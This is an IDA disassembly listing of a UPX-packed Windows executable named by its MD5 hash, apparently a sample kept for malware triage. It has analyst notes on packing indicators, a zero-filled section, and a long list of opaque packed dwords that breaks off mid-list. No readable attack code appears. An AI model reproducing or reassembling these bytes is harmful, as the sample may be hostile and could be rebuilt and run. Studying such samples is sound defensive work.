;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 4B92B607C8F5CD4796C6F65E4DC8A2B3
; File Name : u:\work\4b92b607c8f5cd4796c6f65e4dc8a2b3_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31500000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
;
; ---------------------------------------------------------------------------
; Analyst notes (added in review; hedged where the listing does not settle it)
;  - The section names UPX0/UPX1 follow the naming the UPX packer uses. UPX0
;    below is flagged Bss + Read/Write/Execute and holds only zeros, which
;    matches the empty region a UPX stub decompresses into at run time.
;  - Flags E0000080 = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ |
;    IMAGE_SCN_MEM_WRITE | IMAGE_SCN_CNT_UNINITIALIZED_DATA. A section that is
;    both writable and executable is a common static triage indicator for
;    packed or self-modifying images.
;  - The file name ends in "_unpacked", yet UPX0 is still zero-filled here, and
;    its raw size/offset equal its virtual size/address.
;    NOTE(review): presumably a memory-layout dump in which the original code
;    was not recovered - confirm before treating instruction-looking regions
;    of UPX1 as real code rather than packed bytes decoded as instructions.
; ---------------------------------------------------------------------------

                .686p
                .mmx
                .model flat

; ===========================================================================

; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0            segment para public 'CODE' use32
                assume cs:UPX0
                ;org 31501000h
                assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
                dd 1400h dup(0)         ; 1400h dwords = 5000h zero bytes, equal to the section's virtual size
UPX0            ends

; Section 2. (virtual address 00006000)
; Virtual size : 00003000 ( 12288.)
; Section size in file : 00003000 ( 12288.)
; Offset to raw data for section: 00006000 ; Flags E0000060: Text Data Executable Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure code ; Segment permissions: Read/Write/Execute UPX1 segment para public 'CODE' use32 assume cs:UPX1 ;org 31506000h assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing dd 0C272D637h, 0AB57AF50h, 69A9AF7Fh, 561004Fh, 0B4E8BCDBh dd 5051B8D9h, 9CF11C7Ah, 0CDEF4509h, 7032FADh, 630F513Ah dd 0BC15D98Bh, 525E80F1h, 2DD9A05Bh, 9BADAFA4h, 0DC45BDAFh dd 0A8D36441h, 0AC15D9AFh, 5573D45Fh, 5825DB06h, 0E064D3Ah dd 48E32DE9h, 15DD00C0h, 0F85A00C4h, 0FAE5940h, 0E4538EB7h dd 426F9038h, 5C94666Ch, 0D5DD9963h, 0AFBDAE9Dh, 0DA2E8FE7h dd 0D8E45D04h, 5070D046h, 0D3101011h, 0BE2C78A9h, 6149303Ah dd 4CEBE9A7h, 4B038C8h, 6E10DA60h, 9CBBC958h, 0B0816AA6h dd 569C6600h, 2F4E731Ch, 1EE6BFE0h, 593A714Ch, 61056738h dd 0D4DD096Ah, 0AF3D1B15h, 6F702B5Bh, 80074A54h, 0AB15D8B0h dd 0A29BAB40h, 4F118607h, 54B08070h, 0AAAA0759h, 64C38A8Ch dd 5E793819h, 0B08840B1h, 0E62DEB66h, 3A64323Ah, 38C7440h dd 3DCAD15Bh, 3614A6ABh, 50525D97h, 505EED38h, 0B136C4B4h dd 4946B6E7h, 8D76718Eh, 25D9AC25h, 0BDA261B0h, 7EC83492h dd 0DB7453BAh, 4940F465h, 0EFB1EFEAh, 0AF072698h, 4DDB0386h dd 2C384DCCh, 0EB0DEABBh, 59029813h, 4883AF63h, 63DC253Ah dd 2CFF3CD7h, 561038AFh, 0C8F01619h, 6327B452h, 63F8384Fh dd 98550304h, 8E34B4B7h, 67270450h, 58609C8Fh, 77DC5F16h dd 7680EDD0h, 65D55F61h, 95EBE7EBh, 5835D3B9h, 50578016h dd 0C0A0EC6Ch, 915E89CAh, 0F5C4106h, 6C711600h, 0B6BB23h dd 41A10C4Fh, 0E08C47E3h, 0BC5C9Bh, 283E5A4Eh, 0A1DF26A8h dd 956F171h, 38D5D975h, 0BCEE5F43h, 0FE47E464h, 0F25490D3h dd 70B84CC2h, 2B50A3ACh, 38383A52h, 90490514h, 1A47C1CEh dd 63E0F052h, 0D75D7B23h, 2D535246h, 3E51F76Dh, 380D2613h dd 38B626CFh, 0E79C6A07h, 3C9D982Bh, 0D4B04B0Ah, 7A203A26h dd 23185E3Ch, 3084C6A4h, 0B15A0E98h, 34DE6223h, 50D42AC7h dd 0E66FF278h, 18E20DCBh, 0E23C6C08h, 0BFC840ACh, 0B23CF998h dd 5F8C5137h, 
0EF5FC000h, 40B92E2Dh, 0FC38AA56h, 8378905Dh dd 968D498Bh, 50785899h, 5C1E54B5h, 0CE9358F4h, 952A098Bh dd 3475A97Dh, 8B4C8613h, 758E107Eh, 0E8F4C7B4h, 5D8E1411h dd 0ECFC7F49h, 4B8E0014h, 66A5C340h, 0C4E74E33h, 0D171C75Dh dd 0EFBEE62Eh, 0B82CFCA9h, 4674F5D0h, 38755650h, 0E0224C02h dd 4CCDCF75h, 0C6A44226h, 0B3EA4B1h, 54BF4806h, 982C3A03h dd 8A1B12Bh, 0EE0604E2h, 0DEBC2B99h, 0B104A21Ch, 0CFB974C0h dd 36310684h, 2874C73Eh, 0D218BD9Fh, 0E252C646h, 0A4455CA8h dd 0DC8F5236h, 0F42A41C9h, 0DB0EF858h, 0A30FA415h, 0BB03FA4h dd 0D3369399h, 7064CBCh, 700A7C38h, 0EFE988E4h, 55E05D7Dh dd 424838A8h, 0AC90D512h, 74B5A9Bh, 5E440A24h, 381B24A8h dd 0A4E309B8h, 0A0DBDFA6h, 6D24A6D5h, 3A001DDDh, 3BFC1170h dd 0AFA6929Fh, 0B85FAC05h, 0FC00B4E9h, 8C5FF678h, 0A05EC6CAh dd 0A805B652h, 0C9FDE759h, 0B4DC50FDh, 12A4DF57h, 27D10E0Fh dd 48D730ACh, 31C05DDBh, 50AC354Fh, 0AE899203h, 6C112FEBh dd 38915307h, 18DB2528h, 28DB64h, 0F0A41DD9h, 65822A94h dd 0C18B887Eh, 9325A003h, 0C30E45C7h, 1701BB51h, 0BD24BC42h dd 8C8DE25Dh, 14871408h, 5E2543A2h, 5B721059h, 527D3DAFh dd 1DDD73BBh, 480001A8h, 7E2B4F18h, 7A61C780h, 0D50D9054h dd 0BD55258Bh, 3AA88690h, 3BBB0853h, 4960AA64h, 8DAB24FBh dd 0A005093Eh, 1240EC2Dh, 0A06E1524h, 36BE3B01h, 30062EBh dd 65AFE861h, 0AA2AEB34h, 0F1119DBEh, 7FFBE263h, 61070758h dd 0AB2F48A0h, 24976BBCh, 0BB863655h, 0A68384Bh, 9B45838h dd 0E9E71CBBh, 0BB55AC5Eh, 0E3545857h, 0A92859DBh, 0C25912D4h dd 30030101h, 37D3615Fh, 31393C7Bh, 98C25DD9h, 0B9FC8D1Dh dd 0E1FF3D5Ah, 978E243h, 0FEC9BD7Dh, 7424AF2Bh, 9CE63AA9h dd 65E3D06Ch, 5CA187h, 5C519063h, 8048CED1h, 802B940h dd 0EC70490Dh, 7F3FAE89h, 58740CA7h, 742CDB26h, 0D5A66344h dd 36472EAFh, 0AFAEB074h, 0C94A3AEFh, 0D0A9A709h, 44D83192h dd 0A76B164Eh, 74D0B92Ch, 3F2A506Bh, 0E2C8868Bh, 7E14B9E7h dd 7FC0A0Fh, 8B535306h, 98368B49h, 42237F5Ch, 8CF58DE1h dd 4900A0h, 0D3FA5006h, 0FC8D3C91h, 843F0627h, 3EDF191Dh dd 0AA38DF3Bh, 97AFA05Ch, 0E631EB58h, 75CD033h, 0D30CD42Bh dd 0EA41B0AEh, 3159332Fh, 6FD04725h, 46492460h, 268DEFD8h dd 5724AC4Bh, 
0DB5C10DBh, 254F60E8h, 96DB2F52h, 0FCBDF60Bh dd 3F64C06Bh, 2C39359Ch, 77E636E5h, 0D05A5A25h, 0D5E50BA7h dd 4A864Fh, 0E8572511h, 4451262Fh, 0CDEE6983h, 1585018h dd 0CA7414DDh, 649D0C71h, 88A72B31h, 953904Bh, 2829120Fh dd 8C99EA40h, 3A887040h, 1150BCD1h, 84B0E091h, 0A4670D68h dd 0E37538BAh, 51A5041h, 48B03A6h, 39BB9938h, 1A5BBCCFh dd 36882DBFh, 7541703Eh, 862A0B74h, 7D6B6C09h, 5C0901E0h dd 0A8478AFDh, 9C89CD0Ah, 0CC65C5D0h, 4BE16DD2h, 8C980A63h dd 17313039h, 0CB46569Dh, 9A0AF0AEh, 9C0D6B44h, 0F1299492h dd 8FBE6450h, 63F1FF90h, 7BCE50E9h, 22916B97h, 9B91DB52h dd 0EB26A727h, 8F1797Bh, 73975348h, 6D4324FCh, 7DE33D73h dd 3A4122A1h, 0F4B8A8CDh, 9FAD94BBh, 561AC6B6h, 41770C97h dd 3EB44EB4h, 45C434A2h, 535BD838h, 8B09D438h, 6CEC867Ch dd 0B329036Ah, 38633A0h, 40B0F827h, 69F9EDDEh, 0AA92B312h dd 7516015h, 0CE4D3D49h, 8086E6BDh, 0B331354h, 86EA4BEDh dd 56A78B79h, 0D9D03838h, 4293D44Dh, 43778B3Dh, 9044BCB0h dd 2671A2A9h, 626E691h, 522B0303h, 0D0416A51h, 70F3FC00h dd 40A06F67h, 3724515Ah, 482DDCFh, 30F3BCA2h, 92334716h dd 9ACBF1Bh, 0AC99AEF3h, 0FB060103h, 0B6A0B44h, 6DDB86Ah dd 0D78F4B76h, 530E4ECBh, 0E24092DCh, 121C820Eh, 2006B51Dh dd 0ADEEB85Ch, 0DD9A4CDh, 0AF5562BCh, 544FAF75h, 0DCF3936Ah dd 0BC4BAD59h, 14B72413h, 99D49CDAh, 0C0008F24h, 67FD4B76h dd 0DF7712BAh, 0B9C0FF20h, 5C343546h, 730FF024h, 0A8F6EF27h dd 284F8869h, 3238E141h, 781B594Ah, 95DADCCh, 3B2BB09h dd 13150F9Fh, 0C87C80E7h, 62051C0h, 2D633CCDh, 0E0EA9DE4h dd 526E4186h, 0D2D6865Bh, 0D00F6029h, 8043194h, 0F3889C41h dd 2CC4B0C0h, 963C60F0h, 4A34F35Eh, 2E76DC8h, 1E9F263Fh dd 5779CC15h, 14455473h, 0C638EE46h, 0E3DE1A87h, 0E2FB434Dh dd 195B0F4Dh, 5D3D2E97h, 6539C9C2h, 40C01438h, 92BE9B1Fh dd 3A631083h, 2F41E0F1h, 41346AD0h, 0F1F9ADBBh, 0D93400BAh dd 0DA55775h, 13F1B037h, 0AA6FAFA3h, 0ABF368DCh, 132A8F33h dd 2C38AC6Ah, 145A370Bh, 24745497h, 0C049515Bh, 82343C51h dd 0CC0496Ch, 4B45808h, 53706253h, 70181C00h, 14706253h dd 5371B86Ch, 9606462h, 0D3B61D69h, 6924D20Fh, 0F60B7838h dd 0EA705DE4h, 0BE1C343h, 5D384856h, 747E9240h, 
5C5A201Ch dd 0F96753B8h, 4F3BB177h, 51A438BCh, 3E197EF0h, 5849E737h dd 5AA37F64h, 543C4BF8h, 7BB89969h, 70C67283h, 6C26462Ch dd 400A2ED9h, 0D868A307h, 4B5DC443h, 0B7BB552Fh, 0F6AFBFD3h dd 6A11655Fh, 0A0054B5Bh, 0E1C05D2Eh, 0D1525846h, 0F0130703h dd 845DAF94h, 54DA4B26h, 245A6C6Eh, 675D6C54h, 8C697B0h dd 165A6EADh, 9A06B4Ah, 0D333B522h, 922724A3h, 17A8FB18h dd 40309E67h, 0E8955469h dd 0FFEB1FD3h, 16539285h, 0EB5C7E9Fh, 0C903353Ch, 0D139C5Eh dd 0C240AFD8h, 6E221BD3h, 2A75030h, 3DCE7646h, 9D213840h dd 0F4402590h, 966BC499h, 9708D3A8h, 0CC246C71h, 3FDEED08h dd 55FC34B6h, 0F2572448h, 64DBB3BBh, 6DD71B6Bh, 6AAC0511h dd 0BB6A0D7Ah, 2A567007h, 0AA0587AFh, 0FE6EE122h, 579B11E8h dd 9ADBCF0h, 659C91Fh, 0D090BBEBh, 777055F4h, 47BC971Ch dd 5B665F82h, 0D1BCC053h, 7A42ACCDh, 385C03D2h, 90D54DDCh dd 43ABC463h, 0B04C6BF6h, 29225FEDh, 88EAC0F6h, 59D8F2A8h dd 0D82F1FD0h, 1BA0D751h, 15DA010Fh, 15D8705Bh, 888B62AFh dd 2752AA6Ah, 0B67E8F4Fh, 0EA0D6861h, 5B0DD875h, 0B7284464h dd 0EC5143BDh, 37F1E75Fh, 0A843AF09h, 0A7C9D977h, 28653AEh dd 0D093AEC1h, 0ED22AFABh, 3CEA300Eh, 26326B09h, 2B7613D0h dd 65DB90DEh, 9D083863h, 1FDD3C25h, 0E85AD16Eh, 0BD590DC4h dd 5BD36648h, 257C2540h, 0F375E35Fh, 2B385C81h, 906DD990h dd 62E5ECD3h, 8753AFD4h, 39ABD113h, 0F4FA3DA2h, 0D70FCF6Ch dd 531CAF0Dh, 232B08E3h, 372DF28Bh, 7FDC530Fh, 2D07C006h dd 81EC87ADh, 0AEAF54A3h, 0D82F6CCCh, 8B5E3BA7h, 0DBBFBB38h dd 8CC96B74h, 0C3E06EFAh, 0F0F395CDh, 77FCE07h, 7CA6B4CCh dd 9A82C44h, 45717843h, 0AF4A45EAh, 0BE25E331h, 65C188C8h dd 0D577F17Ch, 0CE83EE83h, 28C96062h, 63FE20D4h, 32B0FC81h dd 98D31E92h, 0ED2493DFh, 572F0030h, 6DBD27D8h, 5FEB6160h dd 6751535Bh, 38E0A170h, 40EC0BF4h, 0C7EEF841h, 3C00FF51h dd 5BD096FFh, 532F2B8Fh, 54FEA56h, 7BD6306h, 0B6887DD9h dd 4019DF5Dh, 5CF560E9h, 5C93DBE1h, 9DA4AD4Fh, 8B650544h dd 0A69C308Dh, 3A525Bh, 0F90BC868h, 0A7DAE87h, 50C68255h dd 41594824h, 60302FF7h, 550EEBA7h, 42934449h, 533CDB23h dd 653ED7B1h, 2475ADD1h, 4E82055Dh, 97E64E40h, 567401Eh dd 48741C66h, 4AF58486h, 2E65BD67h, 47E01841h, 
4E8B5EBDh dd 0BF441B09h, 0BBCF55C3h, 74E716A2h, 39255DD3h, 63CD8DBBh dd 385EC522h, 0F15B016Fh, 1BC1E6B1h, 45407CD0h, 6842405Ch dd 3BE3EEDCh, 82645860h, 0B7EE501h, 648F7C7h, 48AC40h dd 0D59664E2h, 6D066EDDh, 3C7A8924h, 0AACBF9CFh, 1E364448h dd 81787048h, 53CD3DDBh, 55F0E28h, 0FA9E870Ah, 1D06DD19h dd 4B7C067Eh, 39E99C0h, 77700506h, 86229866h, 25A018Ah dd 1629745Ch, 0D5C4CC3h, 3851787Dh, 4D554E7Ch, 0BDB81ECFh dd 5F8B8E7Fh, 6CE2C4DEh, 1E660C4Eh, 4E5DA729h, 463CA5A1h dd 471C80E8h, 2A8EE61Bh, 88616538h, 0E12D7722h, 559740E3h dd 7AD30070h, 0EBBB3444h, 0DD172DE2h, 3514E24h, 6FBF06ACh dd 241F252Ah, 0B0E5AF4Ch, 0CB63B815h, 5FAFA25Bh, 0D058024Fh dd 4C650900h, 26FC1666h, 0E8DDDEDh, 68E7EA28h, 7805F06h dd 0C845397h, 0FD98B422h, 9084567Ch, 0CC8CF888h, 694CDE17h dd 0D8B4C4B0h, 34BC20B8h, 73C19C49h, 68A418A0h, 846CB8E0h dd 0EF5A2A64h, 0F334EE8Bh, 0A5203473h, 98E448DBh, 5F81B06h dd 3950B900h, 5EE03C47h, 445B4DFBh, 654864DCh, 6FD3F045h dd 61F25E3h, 52FB68D6h, 0EA655628h, 0FDD43017h, 3AD8A5C4h dd 7738B533h, 63342620h, 0D348F1D4h, 0A8D71D64h, 90D353B0h dd 591FA355h, 0CF4673Ch, 0D9409893h, 3E23606Dh, 0CA03826h dd 445E765Ah, 0B1BC9437h, 3120B168h, 160B106Eh, 0E8702A63h dd 0DB34FBE6h, 9669BE51h, 84ECC472h, 2A40A359h, 0F157B324h dd 577FD6B9h, 0B8290ECCh, 0E90CAB50h, 2CA4076Dh, 304F95AFh dd 73E75297h, 75A54456h, 0EBD402F0h, 0B01F0D5Bh, 40EFD63Ah dd 0C6438F7h, 0D1B21101h, 67246F40h, 43AB46C3h, 0A8EB5ABEh dd 8153C8C6h, 0BEA40302h, 88267F37h, 6D03EC03h, 73BBE168h dd 5FE9FF4Bh, 75629E09h, 302148D8h, 0B2D8369Bh, 0C69D7635h dd 9CEBFD2Dh, 0EB167CD4h, 98477E91h, 0A24570E9h, 33420EBBh dd 1C371B77h, 6134B700h, 360BEB96h, 0AD6B2818h, 98F0FB7Ch dd 5770DC0Bh, 45BB5C18h, 0B46DC11h, 93599D30h, 0E560E852h dd 635CEE08h, 90644F32h, 2338E10Ch, 0EE6A433Ah, 8418991h dd 5C38A107h, 6876570Eh, 12475199h, 0FF4C5416h, 4B605593h dd 48283944h, 0EF4B2787h, 0A9DBBDA4h, 0DD05B105h, 65055E27h dd 3A42DC83h, 5533A658h, 575C5F23h, 4297D370h, 0CADD4107h dd 0C13893D5h, 0A5660C7Ch, 0C02DEBA8h, 10AE744Ch, 0B0DC210h dd 
4226AF3Ch, 96C4B72h, 5E2640B7h, 28444468h, 78EA536Ah dd 6D8E8832h, 9D3BF348h, 0B87300D8h, 219A9566h, 0EE045D83h dd 0E5E71050h, 265B0BDBh, 0E0DB0912h, 0F663AFCDh, 66E65911h dd 3E58C3CDh, 73135800h, 0B08510D3h, 8E6538C7h, 0B81D7B72h dd 0B11AE54Bh, 0A9AE2C2Dh, 0D158BDA6h, 3194CDA9h, 0A75E2327h dd 0C82F3E2Ch, 3422CE6Bh, 5738D792h, 38C77D4Ah, 9EB57153h dd 20C9E63Ah, 45689850h, 0F26E9FABh, 415466FEh, 4017DB76h dd 7678506Dh, 2690F03Dh, 0A8354C27h, 42214975h, 0E8F4316Ah dd 0B04417F6h, 40789A58h, 6AE3332Bh, 5E585C42h, 60CC7B38h dd 0ED08D945h, 3073B196h, 0CF713E91h, 0D782E706h, 5750128Eh dd 81BB5985h, 0FF68A54h, 408A7061h, 5D2D5858h, 917F3DC0h dd 4B023B54h, 0EB57DB6Ah, 33B24A7Dh, 2EDD5664h, 665CA458h dd 0D22D5EC3h, 0ADB01CA9h, 2DE6A4D1h, 8D5D364Ah, 76035718h dd 3CDA9440h, 655491ADh, 0A7005817h, 40F046B8h, 664D707Fh dd 5799D100h, 101A449Ch, 41CD9DDh, 4524A44Ah, 0D38E7E70h dd 97584940h, 237AD116h, 0DBE7E5FEh, 0A7826306h, 5CD7549Fh dd 7C12F95Ah, 8382D5E0h, 5B475EAFh, 900DBF8Ch, 132E505Ch dd 6507ACEDh, 88DD3E4Eh, 7C24DC5Dh, 1491Ah, 73CB6B08h dd 451CF533h, 0E5E0860Fh, 140BD922h, 1A6BF2A8h, 0BC07A806h dd 1273ED2Ch, 36D332BBh, 8DCB7610h, 3561481Dh, 0EE792551h dd 74EA12AEh, 7EAEB87Fh, 647AA954h, 4B25532Eh, 26EF67AFh dd 42B80E5Bh, 5700808h, 51E07F60h, 56594A93h, 0A3802D70h dd 0E6661770h, 0CAB475F5h, 0D3515088h, 0C7DE3C6Dh, 72B4B89Ch dd 0A8B86B57h, 5A67576Ah, 4AFA5B00h, 0E230EC75h, 8051E7A0h dd 0A489B323h, 0AC5F0625h, 93498980h, 287C778Bh, 0DF1355D3h dd 5961107Fh, 660F5EC9h, 0E2931420h, 0FF49FABAh, 538B1206h dd 43783C42h, 0B4F206B4h, 7FBD54C3h, 0D6DDB825h, 0D7FE5BABh dd 0BAB977B6h, 0AC1DDB45h, 0DAEC1656h, 5A4506ADh, 623A862Ch dd 0D3F61944h, 0E3A17843h, 0D540E6A8h, 0C61D371Fh, 2C286284h dd 0ED5F8425h, 2C4DE968h, 4150F5ECh, 80633540h, 8040D7E3h dd 19ECD94Ah, 38907A31h, 257DF51Ch, 90F8E5B0h, 87921183h dd 0CDADDC20h, 0BB83584Fh, 0B8689ECDh, 3EBB312Bh, 3060EE33h dd 56CD2D0Bh, 0F4F5363Ah, 393F125Fh, 0AD984434h, 0D33A405Ch dd 0F4B08F56h, 4A93ED2Dh, 0E7BEEE5Fh, 3F3C1631h, 799D740h dd 
0A43F036Bh, 686912E7h, 9917B4Ah, 0A9E99353h, 0C06914DAh dd 0BB5602BDh, 98984F73h, 59BA8813h, 3053BB98h, 103FBF58h dd 0FE9344FBh, 0D450DA68h, 5BE7DE1Bh, 31DB1A5Fh, 9888DA03h dd 86FD8E6h, 842A0AE4h, 0D8E34C75h, 0EDEE0957h, 1E17FB2Dh dd 5B2C0931h, 562F2A55h, 0BED3A3DAh, 0B44BCE31h, 5F115A8Bh dd 161B110Ah, 7DE58578h, 19320B1Fh, 0E47807D0h, 2A5E4858h dd 25A8C212h, 0B365943Dh dd 440E427Ch, 9F3B773Ah, 0DDCF4C59h, 4E5D14F8h, 28C59F48h dd 83920E08h, 1549474Dh, 6ED1336Bh, 6509717Ch, 0CACC38D5h dd 0F8664CF0h, 2093886Bh, 0C165613h, 5BE45960h, 2B1692DDh dd 17DB3634h, 5C152E01h, 0E4373B26h, 3A512857h, 360C1AB3h dd 72FFED4Dh, 28443285h, 0B4C61DE1h, 73AC63CAh, 26FB4D35h dd 818D8FCBh, 0DB4CC4D4h, 4C707C1Eh, 0B9EDB51h, 465D7A70h dd 0FE3BF61Bh, 0EC7D1259h, 9E1EB43Bh, 7854C041h, 0B0302438h dd 0BD6C5670h, 639DD085h, 3B4CBAEAh, 0F0894C48h, 956FE958h dd 74772Eh, 0E4AF2237h, 61331C74h, 6C8CCB34h, 66383870h dd 0FDFC735Ch, 4361AFFCh, 0E73B09FCh, 6C50B798h, 100274D0h dd 2381C7E1h, 6009083Dh, 467E3B4Dh, 28249Ch, 0D0DB9C56h dd 4C3C2B4h, 8CC74478h, 0F24A76Eh, 7B9D5D7h, 9E70414Fh dd 3E30F531h, 88400E4Dh, 505D2DC5h, 70F0730h, 0D90F680Eh dd 0F8D18A46h, 0CA9135A0h, 0A03C72C0h, 0F2D4EED9h, 15273CE5h dd 522C2ED9h, 746D2420h, 0C22C2E79h, 926894D1h, 6B58115Ch dd 0DCD1170Ch, 89DBB0D9h, 7E3D0D4Ch, 0F031085Dh, 0E5542840h dd 7439E118h, 2E33223Eh, 0CC8A13A8h, 0B0255307h, 685AF9D2h dd 15FCC520h, 30D03476h, 12706A20h, 9F4699F0h, 8B625823h dd 4C7CB553h, 98847658h, 723B7C31h, 5C1219C8h, 0EDBAE08Eh dd 5F850370h, 428E4054h, 0DB7377h, 476000B2h, 7561497Ch dd 296C436Ch, 787A8203h, 0E5A891E1h, 0C438A435h, 12AE874Fh dd 54A82643h, 79BB533Ah, 0D0544348h, 0AD42721Eh, 96D3733Ah dd 0BB6F8560h, 0FE40FCC9h, 1C8121AAh, 8AF44923h, 0B0B83E97h dd 0EC7CA257h, 6158B019h, 5BC0F4E4h, 4444572Bh, 5FA5E48Dh dd 55BCC0C2h, 6A94E893h, 189299E5h, 4094C490h, 0A8468095h dd 0D9A16213h, 0BCA3A035h, 7FE81FE1h, 0ACB8D87Dh, 0B4D5970Ch dd 57D9FD16h, 434270ECh, 941CAB0h, 311D332h, 5C42B464h dd 34B70D56h, 0F2BD7DC9h, 2424482Dh, 0AC0DD913h, 
0EE8F581Dh dd 7B58A88Dh, 30993900h, 916B19BAh, 196A4A26h, 71B2CA81h dd 0ABA41D2Fh, 817F41Fh, 241685D7h, 0D81BC502h, 14D83BC4h dd 79662EA6h, 775931AEh, 25936B4Eh, 95F2F8FEh, 0F166E31Dh dd 72117C7Fh, 0A420DB73h, 20417C70h, 62A2E854h, 9618019Bh dd 2249DFB7h, 3AD65618h, 1FE4C8A4h, 0A75C3593h, 88EF528Bh dd 0D1885356h, 914E5EABh, 0BE49D838h, 0E76B4511h, 0BC67DCE0h dd 2040D510h, 5BD9EF4Fh, 2784E949h, 4868D858h, 0D24C6869h dd 0D7E75FECh, 0AC41DEBh, 538B01D6h, 0CE744C8Dh, 0EB8CB65Ch dd 8DBA43F6h, 4546A40Dh, 98A1F044h, 8CB4880Eh, 1054DD67h dd 208CCA4Ah, 6B7BC0DEh, 41784443h, 0EF49DB0Ch, 509657D6h dd 0A76D1073h, 0CF351EBh, 0FC045995h, 13329424h, 0FC40D96Ch dd 4D858B4Bh, 52B8C7CCh, 0F44DD974h, 92628A7Bh, 0FC88B91Ah dd 56510990h, 690E46E4h, 0E4B06191h, 412431CFh, 0A9575B24h dd 9C684DCAh, 985A8730h, 4DD85CDDh, 600B176Bh, 384ACD4Dh dd 0B7B9D1F8h, 38B88D2Eh, 731657FCh, 0CAD4FF3Dh, 5DA13094h dd 0CFE005A2h, 0D7BA3D24h, 0D3C45725h, 0AA265592h, 93B2DFCh dd 5B3809AAh, 0AF09774Ah, 16394465h, 0FCFE9A0h, 0BF43EDE2h dd 5A759CE8h, 0B71B82Dh, 0BAAFD317h, 58A1C332h, 6263922Ch dd 43361808h, 65E65E90h, 1A137C3h, 0D402C564h, 43FE3FDDh dd 0BBFF221Ch, 650B7B5Eh, 0A737F10Fh, 0D35A5CBBh, 0BBE5506Dh dd 84ADD790h, 0A9D86449h, 2C24248Bh, 67BED43Bh, 881C4B23h dd 4442FD70h, 71882C50h, 1B894454h, 0D290EA57h, 6E41E8F5h dd 0E93A40BBh, 30EC50E6h, 92D14740h, 0C1027428h, 1E915697h dd 8864B871h, 0F783D4C3h, 2F4762B1h, 82395A19h, 9D64CCC2h dd 745D34DAh, 9D5FE840h, 38CB7298h, 228E080h, 4013CADh dd 0CF8E6B88h, 65769576h, 0A08A8ADCh, 0D2A0692Ah, 47AC4330h dd 0A25F2854h, 56A0286Ch, 5F55D4DDh, 113755CDh, 6B094CEBh dd 0E3060387h, 53523D86h, 2BAC1C44h, 0D4502D9Ah, 33EC270h dd 947865C0h, 966B0036h, 50BE9CA3h, 0ACB31B76h, 50EF01D1h dd 53304184h, 88A9079Ah, 0E5188009h, 0F1B64A20h, 0D3FC3608h dd 6A4A4DEh, 1C630380h, 34E03F02h, 0CC55FA6Ch, 0D8B4CA8Ah dd 0DE7F0380h, 734E56E2h, 529C654Bh, 4F7BFD07h, 0D9430C5Fh dd 0A7A541B4h, 0E13B2F98h, 0CD93F6Bh, 167B9A8Ch, 77906D20h dd 0AC1C75C4h, 57265059h, 1A19F6D3h, 5DA2B4D3h, 5B0CE37Ch 
dd 167B281Eh, 4753B824h, 1A3A0C98h, 2051D00Fh, 6E65476h dd 0C69644Fh, 0D97DF928h, 846ECF28h, 7C384612h, 15D6974Bh dd 4C1932E5h, 64F576DAh, 0AB3D5B6Eh, 7260E100h, 93AB1CA6h dd 66B77DB1h, 5A6439F2h, 5F76DE5Fh, 0C0E786B8h, 93604031h dd 30032C5Ch, 838647Bh, 7921DDA8h, 93EC3D5Ch, 7C77A2EAh dd 4ECD0A6Dh, 0A4DF409Fh, 0D4C4659Fh, 0A1BB074h, 0ABEB9125h dd 0FDD684Dh, 57966C51h, 0AF326F2Ch, 0E950221Bh, 8D519B10h dd 3C448751h, 0FD6F883Fh, 0CECD8C00h, 78CF87DDh, 4D107E9Dh dd 20113053h, 49B6114Fh, 47EB1E58h, 50AFB7D7h, 5CD9689Eh dd 0CEBB91D5h, 7E15587Dh, 0C217E7h, 0CB65DD9Fh, 0D4BDB8F5h dd 473550h, 0D4BC8E96h, 44511AC2h, 27833081h, 60F6E99Eh dd 81603D40h, 5015965Fh, 0EB3BEBCEh, 0ECD0992Ch, 2E3570F1h dd 56987A19h, 0F6B98FA1h, 642431A8h, 1840ADD1h, 0B01D3F5Fh dd 70697C23h, 0DE2C1697h, 3CB126A7h, 6D9A5A0h, 8798BB28h dd 690C5DBBh, 90BCEB9h, 3C74A358h, 0BF582264h, 705CA97Dh dd 0B0066785h, 9D0D8680h, 5B835F7Fh, 0D8BA0013h, 315457ECh dd 915F78A7h, 40C87F14h, 0EBB61A99h, 0C44106EDh, 2D0C4731h dd 9C3764D1h, 28484A32h, 0E0B4CC32h, 695D5C3Fh, 4830D300h dd 577CC7D1h, 90952436h, 804EF528h, 60838B05h, 56EEDDCAh dd 0C15B58A7h, 0FFD9ED9Dh, 6475AF9Ch, 2F605545h, 7CCA9652h dd 4701509Ch, 58741CDDh, 0A78FE1ADh, 0B9D14422h, 0D5547D5Bh dd 0BC234751h, 94DB987Bh, 0EC1B068Dh, 0DBB1DB5Ch, 9321103Ah dd 73734C17h, 55487333h, 0CF585C44h, 54737373h, 0D440AC50h dd 2CA86A40h, 402C272Eh, 0B8E84028h, 3EABB9EBh, 5BDE3B06h dd 804D5CBCh, 466B10E8h, 77BFEAB9h, 0C355709Ch, 4358B749h dd 9D485751h, 7D55852h, 0A7995B57h, 7F7B50C6h, 0EE1A5060h dd 1EB0B2B7h, 11304F07h, 7896708h, 5050CE80h, 5413AFABh dd 243808BBh, 7F6A2024h, 6762617Fh, 0AF51607Eh, 61EFADC1h dd 6060686Ah, 357E357Fh, 508F3528h, 392A3F1Dh, 3D313C3Ch dd 7F8BAFAFh, 0D8F7764h, 0E9369963h, 25DD51A1h, 0DAAEDB55h dd 57C96C56h, 0AFDA8F16h, 607C56EFh, 0D8C96416h, 0BDB21757h dd 8AB85ABBh, 35327EAAh, 0AF3FAF37h, 0C3217EABh, 425199C9h dd 0ADC1EDADh, 